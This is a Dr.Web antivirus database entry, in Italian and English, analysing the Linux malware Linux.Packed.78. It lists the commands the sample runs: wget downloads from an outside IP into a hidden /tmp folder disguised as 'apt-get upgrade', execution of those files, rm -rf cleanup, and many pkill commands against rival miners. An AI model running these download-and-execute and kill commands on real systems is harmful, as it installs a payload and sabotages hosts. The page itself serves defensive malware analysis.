Per il corretto funzionamento del sito, è necessario attivare il supporto di JavaScript nel browser.
Linux.Packed.78
Aggiunto al database dei virus Dr.Web:
2018-05-08
La descrizione è stata aggiunta:
2018-05-07
Technical Information
Malicious functions:
Launches processes:
/bin/bash -c mkdir /tmp/.806/
mkdir /tmp/.806/
/bin/bash -c rm -rf /tmp/111
rm -rf /tmp/111
/bin/bash -c unalias pkill
/bin/bash -c unalias ps
/bin/bash -c unalias kill
/bin/bash -c unalias exec
/bin/bash -c unalias chmod
/bin/bash -c exec -a \"asdasd\" wget -q -O /tmp/.806/\"apt-get upgrade\" http://198.144.159.132/ico/error
/usr/bin/wget asdasd -q -O /tmp/.806/apt-get upgrade http://198.144.159.132/ico/error
/bin/bash -c exec -a \"asdas5555\" wget -q -O /tmp/.806/config.json http://198.144.159.132/ico/ico1.jpg
/usr/bin/wget asdas5555 -q -O /tmp/.806/config.json http://198.144.159.132/ico/ico1.jpg
/bin/bash -c echo \"exec -a \\"apt-get upgrade\\" /tmp/.806/\"apt-get upgrade\">/dev/null &\" >> /tmp/.806/apt-get upgrade1;chmod +x /tmp/.806/*;/tmp/.806/apt-get upgrade1
chmod +x /tmp/.806/apt-get /tmp/.806/apt-get upgrade /tmp/.806/config.json
/tmp/.806/apt-get upgrade1
apt-get upgrade upgrade
/bin/bash -c rm -rf /tmp/.806/
rm -rf /tmp/.806/
/bin/bash -c rm -rf /tmp/8061
rm -rf /tmp/8061
/bin/bash -c pkill irq
pkill irq
/bin/bash -c pkill irqbalanc1
pkill irqbalanc1
/bin/bash -c pkill -f apaceha
pkill -f apaceha
/bin/bash -c pkill -f cryptonight
pkill -f cryptonight
/bin/bash -c pkill -f 45.76.102.45
pkill -f 45.76.102.45
/bin/bash -c pkill -f stratum
pkill -f stratum
/bin/bash -c pkill -f mixnerdx
pkill -f mixnerdx
/bin/bash -c pkill -f performedl
pkill -f performedl
/bin/bash -c pkill -f JnKihGjn
pkill -f JnKihGjn
/bin/bash -c pkill -f irqba2anc1
pkill -f irqba2anc1
/bin/bash -c pkill -f irqba5xnc1
pkill -f irqba5xnc1
/bin/bash -c pkill -f irqbnc1
pkill -f irqbnc1
/bin/bash -c pkill -f ir29xc1
pkill -f ir29xc1
/bin/bash -c pkill -f conns
pkill -f conns
/bin/bash -c pkill -f irqbalance
pkill -f irqbalance
/bin/bash -c pkill -f crypto-pool
pkill -f crypto-pool
/bin/bash -c pkill -f minexmr
pkill -f minexmr
/bin/bash -c pkill -f XJnRj
pkill -f XJnRj
/bin/bash -c pkill -f NXLAi
pkill -f NXLAi
/bin/bash -c pkill -f BI5zj
pkill -f BI5zj
/bin/bash -c pkill -f askdljlqw
pkill -f askdljlqw
/bin/bash -c pkill -f minerd
pkill -f minerd
/bin/bash -c pkill -f minergate
pkill -f minergate
/bin/bash -c pkill -f Guard.sh
pkill -f Guard.sh
/bin/bash -c pkill -f ysaydh
pkill -f ysaydh
/bin/bash -c pkill -f bonns
pkill -f bonns
/bin/bash -c pkill -f donns
pkill -f donns
/bin/bash -c pkill -f kxjd
pkill -f kxjd
/bin/bash -c pkill -f 108.61.186.224
pkill -f 108.61.186.224
/bin/bash -c pkill -f Duck.sh
pkill -f Duck.sh
/bin/bash -c pkill -f bonn.sh
pkill -f bonn.sh
/bin/bash -c pkill -f conn.sh
pkill -f conn.sh
/bin/bash -c pkill -f kworker34
pkill -f kworker34
/bin/bash -c pkill -f kw.sh
pkill -f kw.sh
/bin/bash -c pkill -f pro.sh
pkill -f pro.sh
/bin/bash -c pkill -f polkitd
pkill -f polkitd
/bin/bash -c pkill -f acpid
pkill -f acpid
/bin/bash -c \"ps\" auxf|grep -v grep|grep \"irc\"|awk '{print $2}'| head -n1
Kills the following processes:
Performs operations with the file system:
Modifies file access rights:
/tmp/.806/apt-get
/tmp/.806/apt-get upgrade
/tmp/.806/config.json
Creates folders:
Creates or modifies files:
/tmp/.806/apt-get upgrade
/tmp/.806/config.json
/tmp/.806/apt-get
Deletes files:
/tmp/111
/root/apt-get
/root/apt-get upgrade
/root/config.json
/tmp/8061
Network activity:
HTTP GET requests:
19#.###.159.132/ico/error
19#.###.#59.132/ico/ico1.jpg
Other:
Collects CPU information
Collects RAM information
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Scaricate Dr.Web per Android
Gratis per 3 mesi
Tutti i componenti di protezione
Rinnovo versione di prova tramite AppGallery/Google Pay
Continuando a utilizzare questo sito, l'utente acconsente al nostro utilizzo di file Cookie e di altre tecnologie per la raccolta di informazioni statistiche sui visitatori. Per maggiori informazioni
OK